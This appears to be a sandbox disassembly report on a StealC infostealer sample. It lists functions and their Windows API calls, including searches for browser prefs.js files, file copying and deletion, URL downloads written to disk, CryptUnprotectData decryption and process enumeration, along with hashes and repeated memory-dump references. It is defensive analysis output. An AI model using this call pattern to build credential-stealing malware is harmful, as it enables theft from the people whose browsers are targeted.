Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 9e7c8e1940580134266ad34e1bc94cd03240d54d3fae47bc930a7f4d13e624dc
Instruction ID: 54edc90e119e0c069d0a14b0bbc044fd456b6cadfb7c9d68ea1bbc38065e1e70
Opcode Fuzzy Hash: 9e7c8e1940580134266ad34e1bc94cd03240d54d3fae47bc930a7f4d13e624dc
Instruction Fuzzy Hash: CCB139719001189BDB24FF60EC56FED7379AF54300F4085A8E50A9B185EF396B89EF92

Function 00F116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F35124,?,00F11F2C,?,00F351CC,?,?,00000000,?,00000000), ref: 00F11923
StrCmpCA.SHLWAPI(?,00F35274), ref: 00F11973
StrCmpCA.SHLWAPI(?,00F3531C), ref: 00F11989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F11D40
DeleteFileA.KERNEL32(00000000), ref: 00F11DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00F11E20
FindClose.KERNEL32(000000FF), ref: 00F11E32

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Strings

\*.*, xrefs: 00F117F1

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: e57e55c2bd7e24407ea263e86bc0c6123a375310b30f9930234befb1887a18e4
Instruction ID: 1974380a6e382360fc938783cc7113f9c31c5b571ac1abda3dfc452e7b887a1a
Opcode Fuzzy Hash: e57e55c2bd7e24407ea263e86bc0c6123a375310b30f9930234befb1887a18e4
Instruction Fuzzy Hash: DD12E3719101289BDB19FB60EC96EEE7378BF54300F404599F50A66091EF386F89EF91

Function 00F1DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F314B0,00F30C2A), ref: 00F1DAEB
StrCmpCA.SHLWAPI(?,00F314B4), ref: 00F1DB33
StrCmpCA.SHLWAPI(?,00F314B8), ref: 00F1DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 00F1DDCC
FindClose.KERNEL32(000000FF), ref: 00F1DDDE

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: aaa2896d34707a06ca82590b3fb554e13f8194bf5cae3e8c266ec480a8453745
Instruction ID: fcb3411250c0296cd7eae47be655ff2f2e86e1a798e431466d3ab131f31641d9
Opcode Fuzzy Hash: aaa2896d34707a06ca82590b3fb554e13f8194bf5cae3e8c266ec480a8453745
Instruction Fuzzy Hash: 589104729002189BCB14FB70FC569ED777DAF88300F408668F91A96185FF389B59DB92

Function 00F160A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F147EA
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14801
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14818
Part of subcall function 00F147B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00F14839
Part of subcall function 00F147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14849

InternetOpenA.WININET(00F30DF7,00000001,00000000,00000000,00000000), ref: 00F1610F
StrCmpCA.SHLWAPI(?,0177E098), ref: 00F16147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F1618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F161B3
InternetReadFile.WININET(00F22B61,?,00000400,?), ref: 00F161DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F1620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00F16249
InternetCloseHandle.WININET(00F22B61), ref: 00F16253
InternetCloseHandle.WININET(00000000), ref: 00F16260

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: c3b673415d4473e6ce88a4de210873e23046d4201b78f565ecf18a1a3be3ea4c
Instruction ID: 05ef761e851024d04289da9987899f2026f8718657ae22fa054b0716184a55db
Opcode Fuzzy Hash: c3b673415d4473e6ce88a4de210873e23046d4201b78f565ecf18a1a3be3ea4c
Instruction Fuzzy Hash: 0C517CB1940218ABDF24DFA0EC45BEE77B8EF04701F1081A8A606A71C0DB756AC5DF95

Function 00F27B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

GetKeyboardLayoutList.USER32(00000000,00000000,00F305AF), ref: 00F27BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00F27BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00F27C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F27C62
LocalFree.KERNEL32(00000000), ref: 00F27D22

Strings

/ , xrefs: 00F27C7F

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 4c2b126ba2f05fd0b774aabd14627218065acb7caba2cb2b611f96a249dab596
Instruction ID: e94fa0e4451ad3292352bcb677c695e3f5e58d25fb4c3466bfe6dfbe52e456aa
Opcode Fuzzy Hash: 4c2b126ba2f05fd0b774aabd14627218065acb7caba2cb2b611f96a249dab596
Instruction Fuzzy Hash: 6B414F71941228ABDB24EB54EC99BEEB774FF44700F2041D9E10966281DB386F85DFA1

Function 00F1E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F30D73), ref: 00F1E4A2
StrCmpCA.SHLWAPI(?,00F314F8), ref: 00F1E4F2
StrCmpCA.SHLWAPI(?,00F314FC), ref: 00F1E508
FindNextFileA.KERNEL32(000000FF,?), ref: 00F1EBDF

Strings

\*.*, xrefs: 00F1E44D

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: fd0f1289e55a108f61da3ea341967aacc6a477269fc5bf7d32ae9bab93df09d1
Instruction ID: 87d5740c10c87f89118bac9aa86dcf5f09a87bf2029df3b24fa8fd5106fe6d9f
Opcode Fuzzy Hash: fd0f1289e55a108f61da3ea341967aacc6a477269fc5bf7d32ae9bab93df09d1
Instruction Fuzzy Hash: 391237719101289BDB14FB70ECA6EED7379AF54300F4045A9F50A96091EF386F89EF92

Function 00F29600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F2961E
Process32First.KERNEL32(00F30ACA,00000128), ref: 00F29632
Process32Next.KERNEL32(00F30ACA,00000128), ref: 00F29647
StrCmpCA.SHLWAPI(?,00000000), ref: 00F2965C
CloseHandle.KERNEL32(00F30ACA), ref: 00F2967A

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d85ddf2252412d1a7f01f5c06724643c0582c2f5afc102161d9b83979bdcdde5
Instruction ID: 345e14ec6cafb9412f07ac5a95368a2ca06d350305df62162b2d22cd6a5ffd89
Opcode Fuzzy Hash: d85ddf2252412d1a7f01f5c06724643c0582c2f5afc102161d9b83979bdcdde5
Instruction Fuzzy Hash: D0015E75A40318EBCB24DFA4E858BEDBBF8FF08311F004298A90A97240D7749B80DF51

Function 00F28680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F305B7), ref: 00F286CA
Process32First.KERNEL32(?,00000128), ref: 00F286DE
Process32Next.KERNEL32(?,00000128), ref: 00F286F3

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

CloseHandle.KERNEL32(?), ref: 00F28761

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 9254e27312e899dc6bb38c9a36d1ff6aa20115edfd17fd12a155a69e857dd0fa
Instruction ID: 08b785fb7d0fe22ce5456dc3ea554b1ee27d8c4391dc4fce69a8e656abee0fc6
Opcode Fuzzy Hash: 9254e27312e899dc6bb38c9a36d1ff6aa20115edfd17fd12a155a69e857dd0fa
Instruction Fuzzy Hash: 86316B71901228EBCB24DF50EC51FEEB778FF48710F1042A9E50AA6190EF346A85DFA1

Function 00F19B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F19B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00F19BA3
memcpy.MSVCRT(?,?,?), ref: 00F19BC6
LocalFree.KERNEL32(?), ref: 00F19BD3

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
